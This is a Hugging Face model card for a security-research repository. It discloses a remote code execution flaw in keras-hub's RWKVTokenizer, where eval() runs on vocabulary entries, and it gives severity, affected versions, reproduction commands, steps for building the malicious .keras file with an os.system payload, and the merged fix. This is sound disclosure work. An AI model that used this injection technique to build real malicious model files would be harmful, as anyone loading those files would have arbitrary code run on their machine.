Hugging Face's logo

AnthonyJohn
/
rwkv.keras

Keras
huntr
security-research
poc
Model card Files
xet
 Community

You need to agree to share your contact information to access this model

This repository is publicly accessible, but you have to accept the conditions to access its files and content.

Log in or Sign Up to review the conditions and access this model content.

Keras MFV PoC: RCE via eval() in RWKVTokenizer.set_vocabulary

This repository contains a proof-of-concept malicious .keras model file submitted to Huntr's Model File Vulnerability program.

DO NOT load evil_rwkv.keras on a host you care about. It executes arbitrary code on keras.models.load_model() even with default safe_mode=True. Use a disposable container.

Vulnerability

keras_hub.tokenizers.RWKVTokenizer (in keras-hub ≤ 0.28.0) calls Python's built-in eval() on attacker-controlled vocabulary entries inside its set_vocabulary method, which is invoked from __init__. Because the class does not override from_config, deserialization falls back to the unguarded Operation.from_config default (return cls(**config)), giving an attacker-supplied .keras archive a path to arbitrary code execution at load time.

This is structurally the same root pattern as CVE-2026-1462 (TFSMLayer), in a different class that the upstream patch did not audit.

Severity

Self-assessed CVSS 3.1 = 8.8 (HIGH) — CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H. Matches CVE-2026-1462.

Affected

  • Package: keras-hub
  • Versions: ≤ 0.28.0 (released 2026-04-16)
  • Patch status: merged to master 2026-04-29 (PR #2674, commit a9bb249); not yet released as of 2026-05-05.

Reproduction (in a disposable container) 

pip install "keras>=3.14" "tensorflow-cpu" "keras-hub==0.28.0"
huggingface-cli download AnthonyJohn/rwkv.keras evil_rwkv.keras --local-dir .
python -c "import keras; keras.models.load_model('evil_rwkv.keras')"
test -f /tmp/keras_pwned_RWKV && echo 'RCE confirmed' || echo 'no marker'

Expected: keras.models.load_model raises TypeError after the eval has already executed; /tmp/keras_pwned_RWKV exists with content PWNED_via_RWKVTokenizer_eval.

Builder script

The malicious archive in this repo was produced by the script in the linked Huntr submission, summarised:

  1. Build a benign keras.Model containing an RWKVTokenizer with a legitimate vocabulary; save with model.save("benign.keras").
  2. Extract the .keras ZIP, edit config.json so the tokenizer's vocabulary array's first line is "0 __import__('os').system('echo PWNED > /tmp/keras_pwned_RWKV') 1\n" (matching the <idx> <python-literal-repr> <byte-len> format the loader expects).
  3. Repack as a new .keras ZIP. The <repr> field is eval()-ed by the loader, executing the payload.

Suggested fix

Already merged: replace eval() with ast.literal_eval() in both RWKVTokenizer.set_vocabulary and RWKVTokenizerBase.__init__. See keras-team/keras-hub@a9bb249.

Broader recommendation: audit every KerasSaveable subclass on the deserializer's allowlist ({keras, keras_hub, keras_cv, keras_nlp}) for unguarded __init__ side effects. The CVE-2026-1462 patch was a single-class fix; the same root pattern exists in any class that has side-effecty __init__ and lacks a from_config override.

References

Downloads last month
7
Inference Providers NEW
This model isn't deployed by any Inference Provider. 🙋 Ask for provider support